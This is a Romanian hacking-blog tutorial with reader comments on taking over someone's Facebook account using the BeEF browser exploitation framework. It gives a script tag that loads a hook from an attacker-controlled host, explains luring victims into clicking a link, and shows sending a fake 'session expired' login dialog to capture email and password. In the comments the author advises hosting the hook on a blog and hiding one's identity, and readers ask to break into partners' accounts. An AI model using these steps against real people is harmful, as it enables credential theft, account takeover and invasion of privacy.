Cum spargem un cont de Facebook utilizând ingineria socială [BeEF attack]

RECLAMĂ: Te ajută blogul BlackWeb.ro? Atunci abonează-te și la canalul de Youtube. Promit că informațiile nu vă vor dezamăgi. 🙂

Bine ați revenit, dragii mei greenhorn hackers!

Multe persoane au accesat blogul blackweb.ro prin căutări de genul ,,cum spargi o parolă facebook“, ,,cum spargi un cont facebook“, ,,facebook hacking“, ,,soft de spart parole facebook gratuit”, ,,metode uluitoare de spart parole facebook”, ,,spargere parole facebook online”, ,,cum spargem parole facebook contra cost”, ,,program de spart parole facebook tpu beef”, ,,program de spart parole facebook online gratis beef”, ,,spargere cont facebook 2018″, ,,conturi de facebook sparte beef” și multe alte interogări. În primul rând, să nu credeți că o parolă facebook nu poate fi spartă. Totuși, lucrul acesta necesită anumite abilități, pe care le puteți dobândi doar dacă sunteți atenți puțin la ceea ce se postează pe blackweb.ro



Uneori, dacă deții mici abilități, puțin noroc și puține cunoștințe de inginerie socială, poți obține datele de logare facebook ale oricărei persoane. Despre asta este acest tutorial. Dacă nu îți rezervi puțin timp să instalezi Black|Web și să înveți câteva lucruri despre Linux, citind tutorialele Blackweb.ro, această metodă nu va funcționa pentru tine, însă dacă îți rezervi puțin timp să studiezi aici pe Blackweb, o să reușești să obții datele de logare ale unui cont facebook cu această tehnică simplă.
(Toți utilizatorii facebook să fiți atenți, dacă nu doriți să fiți hackuiți!)

Pasul 1: Instalăm Black|Web OS (dacă nu cumva am făcut deja lucrul acesta)

Primul lucru pe care îl avem de făcut este să descărcăm Black|Web. De ce? Pentru că nu putem face un asemenea hack pe sistemul de operare Windows. În Black|Web există un program numit Browser Exploitation Framework (BeEF). Programul este capabil să ne ajute să preluăm controlul browserului victimelor noastre. O dată ce avem controlul browser-ului, sunt foarte multe lucruri pe care le putem face. Unul dintre aceste lucruri este să-i păcălim să ne ofere datele conturilor facebook.

Pasul 2: Deschidem BeEF

Deschidem Black|Web și o să fim întâmpinați de acest screen. Pornim BeEF dând click pe iconița cu văcuța din partea stângă a desktop-ului.

 



O să fim întâmpinați de ,,ecranul de pornire”, să-i spun așa.



Aceasta poate fi partea cea mai dificilă a hack-ului, pentru un începător, însă pentru cineva care are cunoștințe medii, această parte este simplă ca ,,bună ziua”. Așadar, dacă sunteți începători, nu vă aventurați mai departe. O veți da în bară, cel mai probabil. Mai așteptați puțin și mai documentați-vă. În special pe Blackweb, deoarece este singurul blog din România care vă învața așa ceva.
La acest pas, trebuie să faceți victima să dea click pe un link care conține un cod JavaScript, pentru a le ,,prinde” browser-ul. Ca și cum așezați momeala în acul undiței.

Cea mai simplă metodă este de a insera codul în propriul site și a scrie un articol interesant pentru victimă. Lucrul acesta se poate face prin inserarea unui link într-un text precum: Click aici pentru mai multe detalii sau Click aici pentru a vizualiza clip-ul. Folosiți-vă imaginația!

Scriptul arată ceva de genul:

<script src= “http://192.168.1.101:3000/hook.js&#8221 ; type= “text/javascript” ></script>

Pus într-o pagină web, iar atunci când cineva dă click pe el, tu deții controlul browser-ului. De aici, eu o să presupun că voi ați ,,agățat” browser-ul victimei.

Pasul 4: Trimitem o căsuță de dialog victimei

Atunci când am ,,agățat” browser-ul victimei, adresa IP, împreună cu pictogramele sistemului de operare și browser-ului ne va apărea în “Hooked Browsers” din partea stângă. Aici am utilizat browser-ul meu, pentru demonstrație. Chiar nu sunt atât de prost să fac o demonstrație utilizând o victimă, să le dau motiv ăstora să mă arunce la închisoare, pentru violarea corespondenței. Cât se mai dă? Între 3 și 5 ani?

Dacă dăm click pe browser-ul ,,agățat”, BeEF va deschide interfața în partea dreaptă. Observați că inițial avem detalii despre browser. Pe deasupra, mai avem câteva tab-uri. Momentan, pe noi ne interesează tab-ul ,,Commands”.

Acest modul ne permite să trimitem o fereastră pop-up în browser-ul victimei. În cazul nostru o să folosim căsuța de dialog Facebook.

Dacă dăm click pe ,,Dialog Type”, putem vedea că acest modul ne permite să mai creăm câte o căsuță de dialog și pentru LinkedIn, Windows, YouTube, Yammer, sau o căsuță de dialog generală. Selectăm ,,Facebook” în ,,Dialog Type”, apoi dăm click pe butonul ,,Execute”

Când dăm click pe ,,Execute” în BeEF, o căsuță de dialog apare în browser-ul victimei, precum cea de mai jos. Spune victimei că sesiunea Facebook a expirat și trebuie să își introducă din nou datele de logare.

Chiar dacă tu ești suspicios la vederea unui astfel de pop-up, cei mai mulți utilizatori chiar vor crede că sesiunea le-a expirat și vor introduce adresa de mail și parola.

Pasul 6: Adunăm datele

În interfața BeEF. putem vedea că aceste date apar în fereastra ,,COmmand results”. Victima a introdus adresa de mail și parola, iar acestea au fost capturate de BeEF.



Dacă sunteți cu adevărat determinați să spargeți cât mai multe conturi facebook, trebuie să știți că lucrul acesta nu este imposibil, iar ceea ce v-am prezentat este doar una din multele metode de a face lucrul acesta (probabil aceasta este ce mai simplă).

Dacă vrei să dezvolți abilitățile unui hacker cu adevărat competent, poți începe chiar acum, pe Blackweb.ro. Te asigur că vei căpăta cea mai prețioasă abilitate a secolului 21 – hacking-ul.



4.4 5 votes
Article Rating
Subscribe
Notify of
guest
38 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
Andrei
Andrei
2 years ago

daca m-ar putea ajuta care-va sunt ebrahim fatal alfo pe facebook va rog ajutati-ma ofe

Edi
Edi
Reply to  Andrei
2 years ago

Lasă dracu’ hacăreala, Andreiuț! Pune mâna pe o carte de gramatică! 👍

Luigi
Luigi
Reply to  Edi
2 years ago

@Edi: :))))

sergiu somesan
2 years ago

O simplă căutare o să vă arate că am peste 20 de volume publicate. În ultimul roman la care tocmai lucrez folosesc și un hacker pentru spargerea unui cont. Credeți că scena descrisă este veridică? Promit un volum cu autograf pentru această „consultanță” 🙂 Nu-l cunoșteam decât sub numele de Tache și nu aveam de la el decât un număr de telefon unde nu îmi răspundea nimeni, niciodată ci doar căsuța vocală unde lăsam un mesaj. Îl sunasem ieri și azi dimineața am primit un SMS prin care îmi era stabilită o întâlnire pentru azi la ora șase seara în… Read more »

Arhitectul
Arhitectul
Reply to  sergiu somesan
2 years ago

Un hacker care să se prezinte cu numele/pseudonimul de Tache? Dați un search pe google la ,,hacking pseudonyms”, să vă faceți o idee… No offence, dar dacă un hacker s-ar prezenta cu numele de Tache, personal, l-aș considera puțin retardat. Pe deasupra, obișnuiți să mâncați virgule, iar ,,țineți” se scrie fără cratimă în exemplul dvs. Scriem cu cratimă dacă am spune ,,ține-ți minte propriul cod”. Desigur, mai sunt și alte greșeli, dar asta e treaba editorului dvs., nu a mea. Revenind la scena descrisă de dvs. Un cont de facebook se poate sparge în câteva minute butonând telefonul doar în… Read more »

sergiu somesan
Reply to  Arhitectul
2 years ago

Mulțumesc, am să modific în consecință …

Cosmin
Cosmin
2 years ago

Referitor la spargerea unui cont de facebook folosind ingineria
sociala , trebuie sa trimit persoanei in cauza un link cu o pagina web
hostata , adica online ????
Si scriptul din tutorial trebuie sa fie asemanator cu al vostru , as
avea nevoie de putin ajutor

Multumesc !!!

Arhitectul
Arhitectul
Reply to  Cosmin
2 years ago

Poți integra script-ul într-un blog hostat de blogspot, pe care este scris un articol de interes pentru victimă. Scriptul este oferit de Beef. Tot ce se schimbă este ip-ul.

Cosmin
Cosmin
Reply to  Arhitectul
2 years ago

Ati putea sa faceti un tutorial in care sa ne prezentati cum trebuie sa ne protejam pentru a nu fi identificati?

Cosmin
Cosmin
Reply to  BlackWeb.ro
2 years ago

Tutorialul recomandat de dv. este doar pentru cei care folosesc kali linux pe virtualbox ca si sistem de operare secundar, nu?
Eu voiam niste sfaturi despre cum ne-am putea proteja identitatea atunci cand avem kali linux ca si sistem de operare principal.

Arhitectul
Arhitectul
Reply to  Cosmin
2 years ago

Tutorialul prezentat este pentru cei care doresc să utilizeze Kali+Whonix prin Virtualbox, ceea ce este puțin mai greu.

Dacă aveți Kali instalat, puneți whonix pe un stick usb și îl rulați direct din Kali. Mai multe detalii pe:
https://www.whonix.org/wiki/Download

Acum, să răspund și la întrebarea de mai jos, dacă utilizatorul este pe fb utilizând aplicația fb pentru mobil, metoda nu va funcționa. Va trebui să așteptați să fie conectat de pe pc, înainte să inițiați atacul.

Cosmin
Cosmin
Reply to  Arhitectul
2 years ago

Metoda este valabila daca persoana in cauza foloseste un telefon mobil cu android sau ios???

Luigi
Luigi
Reply to  Cosmin
2 years ago

Nu. Trebuie sa foloseasca pc-ul.

Ioana
Ioana
Reply to  Luigi
2 years ago

Si o metoda de spart parola la facebook cand este conectat de pe telefon exista ? 😀

Arhitectul
Arhitectul
Reply to  Ioana
2 years ago

Există, dar e nevoie de mai multă creativitate. 🙂

Bianca Pacuraru
Bianca Pacuraru
Reply to  Arhitectul
2 years ago

Arhitectul, putem lua legatura in privat?

Arhitectul
Arhitectul
Reply to  Bianca Pacuraru
2 years ago

@Bianca: Există secțiunea “Contact”. Însă te rog să citești cu mare atenție ce scrie acolo, înainte de a trimite mesajul.

Ciprian
Ciprian
Reply to  Arhitectul
2 years ago

Ma poti ajuta si pe mine

Arhitectul
Arhitectul
Reply to  Ciprian
2 years ago

Mă-ntrebi? Sau îmi spui? 🙂

Ionut
Ionut
Reply to  Arhitectul
1 year ago

Solicit ajutorul dvs. contracost.Astept raspuns.Multumesc!

Arhitectul
Arhitectul
Reply to  Ionut
1 year ago

O să presupun că nu ați citit ce scrie la secțiunea CONTACT, de aceea citez:
“Nu ne contactați pentru a ne ruga să spargem parolele iubiților, iubitelor, amanților, amantelor, sau a soților și soțiilor care vă înșală. Adresați-vă unui psiholog, faceți o terapie de cuplu, divorțați, sau orice altceva, însă nu ne mai deranjați cu astfel de lucruri. ”

Ajutorul nostru, contracost, se oferă doar celor care doresc să le verificăm securitatea sistemelor.

Butoi
Butoi
1 year ago

Ma m uitat pe blog si am vazut soc soc soc, cum poti sparge un cont de facebook, eu am incercat si la beef cand vreau sa ma log, nu pot scrie nimic. ( daca ma poti ajuta ) adica daca dau control + a vad ce este scris dar nu merg user sau pass

Arhitectul
Arhitectul
Reply to  Butoi
1 year ago

Șoc șoc șoc șoc șoc șoc șoc șoc șoc… Ce distribuție folosești?

Cristina
Cristina
Reply to  Arhitectul
1 year ago

Cum sparg o parola de mess?

Cristina
Cristina
Reply to  Butoi
1 year ago

Cum se face ? Mar interesa

Stefan
Stefan
1 year ago

Buna!Exista vreo metoda de a afla parola cuiva de facebook,fara a interactiona cu acesta?fara a-i trimite vreun mesaj sau link ?ca asa as putea trimite o poza sau orice altceva in care e ascuns un keylogger,sa-l pun sa l descarce si gata,dar o persoana cu mai mult de un neuron ar deveni suspicioasa…

ale
ale
Reply to  Stefan
1 month ago

nu

Stefan
Stefan
1 year ago

Buna!Aceasta metoda functioneaza si daca victima acceseaza site-ul de pe mobil?

Arhitectul
Arhitectul
Reply to  Stefan
1 year ago

Dacă folosește aplicația, nu.

Elena Marin
Elena Marin
1 year ago

Va rog daca ma poate ajuta cineva sa imi sparga un cont facebook, ofer bani!

Arhitectul
Arhitectul
Reply to  Elena Marin
10 months ago

Un milion de dolari, vă rog. Să vă las adresa Bitcoin? 🙂

George enescu
7 months ago

Fain

Ionuț
4 months ago

Vreau sa aflu parola de la Facebook a lui iubita mea și nu știu cum să fac?

Costicea sidonia
3 months ago

Rusu ionut

Răzvan ciulabu Gabriel
2 months ago

Salut vreau sa mă ajuți să sparg un cont de Facebook la cineva

Andrei
Andrei
25 days ago

Salut cum pot descarca black|web os?

linca nicoleta
24 days ago

Vreau sa sparg un cont